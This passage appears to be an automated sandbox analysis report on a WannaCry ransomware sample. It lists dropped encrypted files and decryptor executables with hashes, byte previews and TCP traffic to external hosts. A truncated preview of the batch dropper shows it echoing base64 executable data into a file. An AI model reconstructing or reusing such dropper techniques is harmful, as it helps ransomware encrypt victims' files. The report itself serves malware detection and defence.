                                                  Preview:WANACRY!......Ee...K..c...a...w..#x.....-......nr"i.E.B..g\.W.r...Sg..V3Z.oU.. V...^rL.Z.M'.Pg-..;..!:.De2_N.$c... g.L.=@........Fzu.L.g.J(.K..-C.J.O|...kFd..|$.....RU...q.......:m.2../..F.2...Z)f..L....#W....^..Lqn.=.,.U*.pk[W.a.F..yf_s(.}.A.........5.n................!...g}.WZ.A......UN....~.5.h.N..@.s....I../.W.a-..@...*KUAlpo.j3z..J.lc....//K.&&b.8M.....N....53...JD\...\@.(.{.F.)b9.p.v.5.>K6f.....t*...q..y...U..08.|H....B..].t...._$....?..l..B.f.<.'z.....J\...888.>k...#pq.....gE7..].........3.. ....N7.pZp.y..6..v~...3iO,...o...AAMO.S.~...M..g.).r..2U..=.i.)G..9....#fLq....T.+.f2/..{e...X.R.N.J..Y=.&".....O.gO.....].H..{3....W...R.T....;...-..PI~...s7......q...?..}..,.P.)9'.v*Jk....... ..........k..pq_.....fD.{R?vj..hd...|I.......zy.L.dJ}.. ..g.Q...h&.\.-:.R]..{n.G....+..5.#.....wCt..S..]K.?t.l.V......E>..B..h7.U..n..(.++.%.gJO.....b.T.e.UD..a...T...D...8s)(l.W.....q..$6.J./.z0.....0EN'|c&...!....&...sG..s.M.......8..s...K.:...... ]m.D...j99.

                                                  C:\Users\user\Downloads\SQSJKEBWDT.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.835811531063345
                                                  Encrypted:false
                                                  SSDEEP:24:bkL9sxwsv/nmCd0fMwm+m+Kk+u6k2SdiUfEl0JleYLDJzva2kQtZpCxdyDY6PK5Q:bky2sHnhhwmL+Xp92SnE0SYnBvJt0d45
                                                  MD5:48E7B87DA6ABF247B58EEB642C769B27
                                                  SHA1:9FE89E25F93995F8E04847E797F6B9A0CC1787D5
                                                  SHA-256:FE0B07BCE39F9C549332EF567DBE810CABE11E010B1566F784635D2E3257EB50
                                                  SHA-512:DF7F3697EDF9B4277ED660B7769621875A4FA0032EA7D371F14C204DF4345392DBFCA394418FEA9C396453EFA757A84C0386F0E782FAEBDF4B037490FA2EC04E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!..........hu...N..."..b...}&..S3..fB..Wb..j..6W..H....X6.....ks".....5:.y.a.,fk..v.#..a...4E.....Y..@.+V.....i.&..y.#....pt..[I...)E...}..R..;i..b.C.|.:...3~......c.eRU\.o..B>...H.h....Pb...@...RFK.......en...V....!.\..vO.P.s.i.w..]9..bb....*..i..............x..u....+..r.Q.*..kK~a.U......V..u...?.^..&...,.;='...AF......s"......:zP.y...OM....B...]@......B.o:......M.......V....f.B.B.lv..v....N...r5..<..S/.:..+...T.cF..F..!.a..pO...V|R\.g ......m...G...)..!.o..2o$#.v.u..DKx..n.5..r....N...R...........)..rq..=.lw].......0.........4..Rl4..K....._...3.i..^......<'...t.....^..5....#If..M...MT._.V..r..........c.e..z.8..NP.#.8.v...\...b.8D.........GZX9..X.d...*..^....^E.k...+Cv]gn......}G,H.. .^....V.D.T.$Y.0.(HM....6.k.q.5.f_.V...mT..Q.?g.j~qP...!...........0..9..*.jE...T.G.5....E.."|..q....i..T.wo..j.....[.Jb|..zC.....?I.X.......<}g(......`$...[..t@.Zd.1.d.NUK.V.i...L Q.....>..T.t....~{"%......h..p...HW...6Q..u.,.u9..f6...=/..D1K..\aF...P_.\.

                                                  C:\Users\user\Downloads\ZQIXMVQGAH.docx.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.857345873249316
                                                  Encrypted:false
                                                  SSDEEP:24:bk+nlYLsOWwrc3mz68lzQmMW3tPI3pfYiN2I7fYO2Myu1G0Ex02TvziHP7MJvjrb:bknLsUcWuLmMWtAZQvGYmu7vziHP7mBd
                                                  MD5:47F102326749FF57A0732F884AF0266D
                                                  SHA1:77354DDD18E32BEAB839C1416C8F6F75F84A7BDA
                                                  SHA-256:308A19024B147FBC4BE87291F308F1B2BEFE8B5C9549412959D8753FE31877D7
                                                  SHA-512:1070E934DACDFD2DCDC37EA737191E72FC95ED60093A4A5089439CD2140481FAF7173DD5D3F276895E122B751035C003DBAB216DB47E8F44AB15456F4811BB2B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....o...jF...a>.....k[.wN.D..sV.R...A..j!..]..LQ.....w|....1.h.v3..y..>0.^..#F]i5[....l[............~..9x..d...0O..=e....[...\..~9....M.AaB...W...G$......*1...e....)7.V...0R#\.v...K..X3d....*..ey...wi.o.)...w...YOC.p..N..47....S.,...5.....H(PJ.................C...as.PS.y'J2K*,....u.....a.tA."=..f.k^.S.=. .........T.e.....~.....h...9$9.~oX"&..,.7....v..i...V.).5.g..50..U._:K.zt...e..".MC...Ohq..ra...l.i........';hcADN.E.c...{...<..mY+...8......q.u.n..qu...I.u...&..d.L(..*..z...8..Q....qf}...X..6...p.|6S..@.Z.h.A=....!.......Y.....[T..~..`.x...+.q..).=.......~....9...i~r~G.8f.....t...:y...|h<<.b.7.v6A_.O..2.j...#. ~_....7..b...KX.....y=....r....[.!.I...3..;...3|..6.....T..P..="$.p..VW...o..6.~.....c..d.....%Y.v.R|..z .....R...f.Ga.CS......u.+U..,...`R.9.b.#l..l..ba..!,.....$u.:_.......J...}..$S.xR.JV....2Sb.....N+e.>u.^...*Q>.}W...w."M0dx.7...y....l..{@..ztr.m...h.....VX.Z.Q.,.L.....d.....8..36[[#1ua}.w.$...f.A.B...K.Vy.2.6....%v.[CF.

                                                  C:\Users\user\Downloads\ZQIXMVQGAH.xlsx.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.852353575907645
                                                  Encrypted:false
                                                  SSDEEP:24:bkmns7M68k6q89xg+q48lEqICiP4Psw1F6mXrBm89hxM8I:bkmnOHx6qlB4tqIGsw1F6KrBpFMj
                                                  MD5:B377A7AEFD366065EC2CEBBB6D7CD909
                                                  SHA1:4B9508A33FC5E7C8818471BA760B42271788AA65
                                                  SHA-256:158E4D6C1F955B94C9440F048FBAA612E3740268109F6A69A7808D4009F1BDE5
                                                  SHA-512:267C5DA8028447914B1DCA3A9289C195F6987973185028A9F6781D3397467CF3EDCE9A45D3260DD0834E52167FDCAD7DB523DE795F2339E72ECA01D27FACA720
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....r.;7J..6.V.....{.).C.a}O@..a^...I..N.C.Gp...b.H....=.%.O^....5`..3hH?L.F._.#A...^..v.~.W\C.{.....I.SC...(...x..'j.P$.&...thHM4x5..E.~f.....L.....1}.3..Ea+jd.....z.J.D.G..y..&.5...)../3..C{w.|,....k......M...u.m.4.C.H_..../..o..".......O.L$.f................2x..EDT?O../..>.s.;......bD..._.<..0."..v=.%"...p.3..th.s..*..U......f.'.i...Yt]CM.........Ooo..w.....X...g5..#.4<.#R.Hc..U./.Q].....~Q....]..K`..5....E3.?.6y...o...}..D..K.W.r.9=...p..-3.Fy....XS.O....*.T.../......."x..`9.....g.5sh.X..J.,....L...SN-.+l.]N....q.....[.J...........z.6..]w..K@...`..Qc.......,....n..iV=...".....> i...&..%a0".w.~`IZ.$....>.Q.y.Q....w.........H(,x....c....R.~......8.#.......n.p..Fur...%.........`..Tgp.T.....HF...L..A.z;.W...x...x..&.y.OX...~ ....y.3m..3.#...Y..B.F^...1,.7....Ss<b..<..e.W9..j..r.....2...!..\~S...+-..<...Pt...O:....O.-...X.vH.q|..F..h(..C~....v..-.J:.KSY...=Q..L......q..~M.h........S...T..P..eek..T%.>T..N...;.=..+[....&.{..

                                                  C:\Users\Default\Desktop\@WanaDecryptor@.bmp

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:PC bitmap, Windows 3.x format, 800 x 600 x 24, image size 1440000, resolution 3779 x 3779 px/m, cbSize 1440054, bits offset 54
                                                  Category:dropped
                                                  Size (bytes):1440054
                                                  Entropy (8bit):0.3363393123555661
                                                  Encrypted:false
                                                  SSDEEP:384:zYzuP4tiuOub2WuzvqOFgjexqO5XgYWTIWv/+:sbL+
                                                  MD5:C17170262312F3BE7027BC2CA825BF0C
                                                  SHA1:F19ECEDA82973239A1FDC5826BCE7691E5DCB4FB
                                                  SHA-256:D5E0E8694DDC0548D8E6B87C83D50F4AB85C1DEBADB106D6A6A794C3E746F4FA
                                                  SHA-512:C6160FD03AD659C8DD9CF2A83F9FDCD34F2DB4F8F27F33C5AFD52ACED49DFA9CE4909211C221A0479DBBB6E6C985385557C495FC04D3400FF21A0FBBAE42EE7C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:BM6.......6...(... ...X.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\Default\Desktop\@WanaDecryptor@.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):245760
                                                  Entropy (8bit):6.278920408390635
                                                  Encrypted:false
                                                  SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                                  MD5:7BF2B57F2A205768755C07F238FB32CC
                                                  SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                                  SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
                                                  SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 96%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a......b.......u.......`.....d.......j.......e...W...b...a.......W...s.......`...Richa...................PE..L.....[J.................@...p.......1.......P....@..................................................................................0..|............................................................................P...............................text....3.......@.................. ..`.rdata..h....P.......P..............@..@.data....2.......0..................@....rsrc...|....0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\Public\Desktop\@WanaDecryptor@.bmp

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:PC bitmap, Windows 3.x format, 800 x 600 x 24, image size 1440000, resolution 3779 x 3779 px/m, cbSize 1440054, bits offset 54
                                                  Category:dropped
                                                  Size (bytes):1440054
                                                  Entropy (8bit):0.3363393123555661
                                                  Encrypted:false
                                                  SSDEEP:384:zYzuP4tiuOub2WuzvqOFgjexqO5XgYWTIWv/+:sbL+
                                                  MD5:C17170262312F3BE7027BC2CA825BF0C
                                                  SHA1:F19ECEDA82973239A1FDC5826BCE7691E5DCB4FB
                                                  SHA-256:D5E0E8694DDC0548D8E6B87C83D50F4AB85C1DEBADB106D6A6A794C3E746F4FA
                                                  SHA-512:C6160FD03AD659C8DD9CF2A83F9FDCD34F2DB4F8F27F33C5AFD52ACED49DFA9CE4909211C221A0479DBBB6E6C985385557C495FC04D3400FF21A0FBBAE42EE7C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:BM6.......6...(... ...X.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\Public\Desktop\@WanaDecryptor@.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):245760
                                                  Entropy (8bit):6.278920408390635
                                                  Encrypted:false
                                                  SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                                  MD5:7BF2B57F2A205768755C07F238FB32CC
                                                  SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                                  SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
                                                  SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 96%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a......b.......u.......`.....d.......j.......e...W...b...a.......W...s.......`...Richa...................PE..L.....[J.................@...p.......1.......P....@..................................................................................0..|............................................................................P...............................text....3.......@.................. ..`.rdata..h....P.......P..............@..@.data....2.......0..................@....rsrc...|....0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................

                                                  \Device\ConDrv

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                  File Type:ASCII text, with CRLF, CR line terminators
                                                  Category:dropped
                                                  Size (bytes):48
                                                  Entropy (8bit):4.305255793112395
                                                  Encrypted:false
                                                  SSDEEP:3:8yzGc7C1RREal:nzGtRV
                                                  MD5:6ED2062D4FB53D847335AE403B23BE62
                                                  SHA1:C3030ED2C3090594869691199F46BE7A9A12E035
                                                  SHA-256:43B5390113DCBFA597C4AAA154347D72F660DB5F2A0398EB3C1D35793E8220B9
                                                  SHA-512:C9C302215394FEC0B38129280A8303E0AF46BA71B75672665D89828C6F68A54E18430F953CE36B74F50DC0F658CA26AC3572EA60F9E6714AFFC9FB623E3C54FC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:ERROR:...Description = Initialization failure...

                                                  Static File Info

                                                  General

                                                  File type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Entropy (8bit):6.009118235585824
                                                  TrID:
                                                    File name:WannaCry.cmd
                                                    File size:6223568
                                                    MD5:8da35604db8350a0bbb7ac41e0609bb3
                                                    SHA1:6160e62c45e1fe8028da7aa8b9f5c1a4d9bf22c3
                                                    SHA256:5badd8294b5ab8aebdaef9cef14176ceb4765f170414042e828903e092d93686
                                                    SHA512:2d4dfe6f334c0a20d1fb66f7512b18699c2f7056624fff7fdbbf58383e07c22de0a76e903204fb8a1bb1e4414bfa73b95a07128823a0e964be4bf7344daa578d
                                                    SSDEEP:49152:mTlQjr91BV/MWMtZ9f0o/pCMcmkgvgplcvflU5tKE0qrwJu8W/9eL3:k
                                                    TLSH:6D56DE2135863ACED416DFB649F0AD1D6BF734233A028CD85897427A2D3FBC8791DA16
                                                    File Content Preview:@echo off..msg * Has Sido Hackeado!..echo -----BEGIN CERTIFICATE----->>WANNACRY.bin..echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>WANNACRY.bin..echo AAAAAAAAAAAAAAAA+AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5v>>WANNACRY.bin..

                                                    File Icon

                                                    Icon Hash:9686878b929a9886

                                                    Network Behavior

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    May 15, 2023 09:31:20.504465103 CEST49836443192.168.11.205.9.158.75
                                                    May 15, 2023 09:31:20.504585981 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.504589081 CEST443498365.9.158.75192.168.11.20
                                                    May 15, 2023 09:31:20.504748106 CEST49836443192.168.11.205.9.158.75
                                                    May 15, 2023 09:31:20.513878107 CEST49836443192.168.11.205.9.158.75
                                                    May 15, 2023 09:31:20.513952017 CEST443498365.9.158.75192.168.11.20
                                                    May 15, 2023 09:31:20.531945944 CEST443498365.9.158.75192.168.11.20
                                                    May 15, 2023 09:31:20.538785934 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.539009094 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.539139986 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.573807955 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.575624943 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.609824896 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.610250950 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.643271923 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.643316984 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.643500090 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.644093037 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.678061962 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.687748909 CEST49838443192.168.11.205.9.158.75
                                                    May 15, 2023 09:31:20.687771082 CEST443498385.9.158.75192.168.11.20
                                                    May 15, 2023 09:31:20.687789917 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.687917948 CEST49838443192.168.11.205.9.158.75
                                                    May 15, 2023 09:31:20.688174963 CEST49838443192.168.11.205.9.158.75
                                                    May 15, 2023 09:31:20.688185930 CEST443498385.9.158.75192.168.11.20
                                                    May 15, 2023 09:31:20.702009916 CEST443498385.9.158.75192.168.11.20
                                                    May 15, 2023 09:31:20.721831083 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.721853971 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.721868992 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.721882105 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.721898079 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.721911907 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.721927881 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.721942902 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.721959114 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.721972942 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.721987009 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.722002029 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.722160101 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.722184896 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.722210884 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.755372047 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.755425930 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.755465984 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.755503893 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.755539894 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.755575895 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.755611897 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.755651951 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.755660057 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.755712986 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.755722046 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.755764961 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.755803108 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.755840063 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.755856991 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.755892992 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.755911112 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.755943060 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.755980015 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.756042957 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.756118059 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.756222963 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.789052963 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.789134026 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.789196014 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.789251089 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.789309025 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.789355993 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.789397001 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.789397001 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.789438963 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.789544106 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.789571047 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.789625883 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.789652109 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.789715052 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.789721966 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.789788961 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.789798975 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.789869070 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.789880037 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.789961100 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.789977074 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.790024042 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.790054083 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.790105104 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.790128946 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.790201902 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.790241003 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.790301085 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.790307999 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.790371895 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.790384054 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.790436029 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.790467024 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.790528059 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.790537119 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.790608883 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.790647984 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.790685892 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.790698051 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.790752888 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.790781021 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.790837049 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.790859938 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.790936947 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.790956974 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.791016102 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.791026115 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.791090012 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.791101933 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.791162968 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.791198015 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.791245937 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.791251898 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.791342020 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.791409969 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.824301004 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.824383020 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.824440956 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.824500084 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.824520111 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.824601889 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.824662924 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.824670076 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.824742079 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.824800014 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.824807882 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.824876070 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.824888945 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.824937105 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.824968100 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.825030088 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.825036049 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.825102091 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.825130939 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.825182915 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.825239897 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.825268984 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.825318098 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.825340033 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.825393915 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.825438976 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.825438976 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.825478077 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.825537920 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.825573921 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.825620890 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.825627089 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.825671911 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.825711012 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.825767040 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.825808048 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.825841904 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.825855017 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.825906992 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.825936079 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.825992107 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.826033115 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.826066971 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.826126099 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.826133966 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.826133966 CEST4983780192.168.11.20171.25.193.9
                                                    May 15, 2023 09:31:20.826283932 CEST8049837171.25.193.9192.168.11.20
                                                    May 15, 2023 09:31:20.826292038 CEST4983780192.168.11.20171.25.193.9
